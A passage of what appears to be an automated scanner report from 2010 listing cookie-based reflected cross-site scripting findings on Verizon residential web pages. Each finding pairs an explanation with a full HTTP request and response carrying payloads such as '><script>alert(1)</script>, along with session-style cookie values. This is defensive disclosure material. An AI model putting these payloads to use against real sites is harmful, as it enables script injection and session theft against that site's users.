The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 79db9'><script>alert(1)</script>84341307296 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/Overview.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX79db9'><script>alert(1)</script>84341307296; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 70909
Expires: Sat, 20 Nov 2010 02:53:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:53:19 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:19 GMT; path=/
Set-Cookie: ContextInfo_State=TX79db9'><script>alert(1)</script>84341307296; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:19 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:19 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:19 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX79DB9'><SCRIPT>ALERT(1)</SCRIPT>84341307296 ' />
...[SNIP]...

3.292. https://www22.verizon.com/Residential/aboutFiOS/Overview.htm [dotcomsid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/aboutFiOS/Overview.htm

Issue detail

The value of the dotcomsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6862"-alert(1)-"9695dc43a78 was submitted in the dotcomsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Residential/aboutFiOS/Overview.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=c6862"-alert(1)-"9695dc43a78; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 76442
Expires: Sat, 20 Nov 2010 02:53:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:53:15 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:15 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:15 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:15 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:15 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
OS Digital TV and High-Speed Internet Features','');
function startmenu()
{
}
var mvzOptIn="N";
var strdotcomval = "c6862"-alert(1)-"9695dc43a78"
if(mvzOptIn != 'Y' || strdotcomval == "")
{
    var m_view = new VZT.MasterNavView();
    var m_model = {container: document.getElementB
...[SNIP]...

3.293. https://www22.verizon.com/Residential/aboutFiOS/labs/labs.htm [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/aboutFiOS/labs/labs.htm

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d0dac'><script>alert(1)</script>82a3c612b6a was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/labs/labs.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXd0dac'><script>alert(1)</script>82a3c612b6a; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 78167
Expires: Sat, 20 Nov 2010 02:53:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:53:26 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:26 GMT; path=/
Set-Cookie: ContextInfo_State=TXd0dac'><script>alert(1)</script>82a3c612b6a; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:26 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:26 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:26 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXD0DAC'><SCRIPT>ALERT(1)</SCRIPT>82A3C612B6A ' />
...[SNIP]...

3.294. https://www22.verizon.com/Residential/aboutFiOS/labs/labs.htm [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/aboutFiOS/labs/labs.htm

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload 3db93<script>alert(1)</script>e45ae62280 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/labs/labs.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX3db93<script>alert(1)</script>e45ae62280; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 78161
Expires: Sat, 20 Nov 2010 02:53:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:53:32 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:32 GMT; path=/
Set-Cookie: ContextInfo_State=TX3db93<script>alert(1)</script>e45ae62280; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:32 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:32 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:32 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX3DB93<SCRIPT>ALERT(1)</SCRIPT>E45AE62280 </DIV>
...[SNIP]...

3.295. https://www22.verizon.com/Residential/aboutFiOS/labs/labs.htm [dotcomsid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/aboutFiOS/labs/labs.htm

Issue detail

The value of the dotcomsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f41c"-alert(1)-"037c2ee7a79 was submitted in the dotcomsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Residential/aboutFiOS/labs/labs.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
